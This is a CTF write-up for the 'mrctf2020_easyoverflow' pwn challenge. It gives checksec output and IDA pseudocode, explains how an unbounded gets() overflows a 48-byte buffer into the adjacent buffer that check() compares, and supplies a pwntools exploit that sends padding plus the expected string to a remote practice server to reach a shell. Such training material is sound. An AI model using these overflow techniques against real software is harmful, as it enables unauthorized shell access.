
mrctf2020_easyoverflow

Ubuntu 16.04


0x01


checksec

[*] '/home/zelas/Desktop/pwn/mrctf2020_easyoverflow/mrctf2020_easyoverflow'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

保护全开

IDA

main()

/*
 * IDA pseudocode of the binary's main(), reproduced as decompiled.
 *
 * Stack layout, taken from the rsp/rbp offsets the decompiler reports:
 *   v4   rbp-0x70   48-byte input buffer filled by gets()
 *   v5   rbp-0x40   24-byte buffer that starts immediately after v4
 *   v6..v9          zeroed tail after v5
 *   v10  rbp-0x08   stack canary loaded from fs:0x28
 *
 * gets() has no length bound, so any input longer than 48 bytes spills
 * into v5, which is the value check() inspects.  v5 lies below the canary
 * slot, so overwriting v5 alone never touches rbp-8 and the canary gives
 * no protection against this particular write.  The fix is a bounded read
 * (fgets/read limited to sizeof v4) and not deriving a security decision
 * from a buffer adjacent to attacker-controlled input.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[48]; // [rsp+0h] [rbp-70h] BYREF   user-controlled input buffer
char v5[24]; // [rsp+30h] [rbp-40h] BYREF   directly above v4: 0x70 - 0x40 = 0x30 = 48 bytes
__int64 v6; // [rsp+48h] [rbp-28h]
__int64 v7; // [rsp+50h] [rbp-20h]
__int64 v8; // [rsp+58h] [rbp-18h]
__int16 v9; // [rsp+60h] [rbp-10h]
unsigned __int64 v10; // [rsp+68h] [rbp-8h]   stack canary

v10 = __readfsqword(0x28u); // load the canary
strcpy(v5, "ju3t_@_f@k3_f1@g"); // placeholder; check() compares v5 against the separate global fake_flag
v6 = 0LL;
v7 = 0LL;
v8 = 0LL;
v9 = 0;
gets(v4, argv); // unbounded read into the 48-byte v4 -- bytes beyond 48 land in v5 (the overflow); the second argument is presumably a decompiler artifact, gets() takes one
if ( !(unsigned int)check((__int64)v5) ) // v5 must match fake_flag, see check()
exit(0);
system("/bin/sh"); // reached only when check() returned non-zero
return 0;
}

check()

/*
 * IDA pseudocode of check(): compares the bytes at a1 with the global
 * fake_flag (defined elsewhere in the binary, not shown here).
 *
 * Returns 1 once the first strlen(fake_flag) bytes of a1 all match, and 0
 * at the first mismatch.  Only that prefix is examined: nothing after
 * position strlen(fake_flag) in a1 is looked at, and the read from a1 is
 * bounded solely by strlen(fake_flag).  In main() a1 is v5, the buffer
 * that gets() can overwrite, so this comparison is made against
 * attacker-influenced memory.
 */
__int64 __fastcall check(__int64 a1)
{
int i; // [rsp+18h] [rbp-8h]   byte index into both strings
int v3; // [rsp+1Ch] [rbp-4h]   strlen(fake_flag): number of bytes compared

v3 = strlen(fake_flag);
for ( i = 0; ; ++i )
{
if ( i == v3 ) // every byte of fake_flag matched
return 1LL;
if ( *(_BYTE *)(i + a1) != fake_flag[i] ) // first mismatch ends the scan
break;
}
return 0LL;
}

0x02


思路

gets() 的溢出可以使 v4 覆盖 v5：v4 在 rbp-0x70，v5 在 rbp-0x40，两者相邻；而 canary 在 rbp-8，只覆盖到 v5 不会触碰 canary，所以 Canary 保护在这里不起作用。

把 v5 改写成 fake_flag 即可（check() 只比较前 strlen(fake_flag) 个字节）。

0x03


exp

from pwn import *

# Offsets come from the decompiled main():
#   v4 at rbp-0x70  (48 bytes, filled by gets())
#   v5 at rbp-0x40  (the buffer check() compares with fake_flag)
# Filling v4 completely makes the following bytes land in v5.
context(os='linux', arch='amd64', log_level='debug')
io = remote('node4.buuoj.cn', 25496)
path = './mrctf2020_easyoverflow'
# Local alternative to the remote target:
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

# Bytes check() expects to find in v5 (the binary's fake_flag global;
# confirm against the strings in the ELF).  The value main() originally
# strcpy()s into v5 is kept only for reference.
a1 = b'n0t_r3@11y_f1@g'
v5 = 'ju3t_@_f@k3_f1@g'

V4_OFFSET = 0x70          # rbp - 0x70
V5_OFFSET = 0x40          # rbp - 0x40
padding = V4_OFFSET - V5_OFFSET   # 0x30 == sizeof(v4)


def build_payload(fill_len, expected):
    """Return `fill_len` filler bytes followed by the bytes destined for v5."""
    return flat(b'a' * fill_len, expected)


payload = build_payload(padding, a1)
io.sendline(payload)
io.interactive()

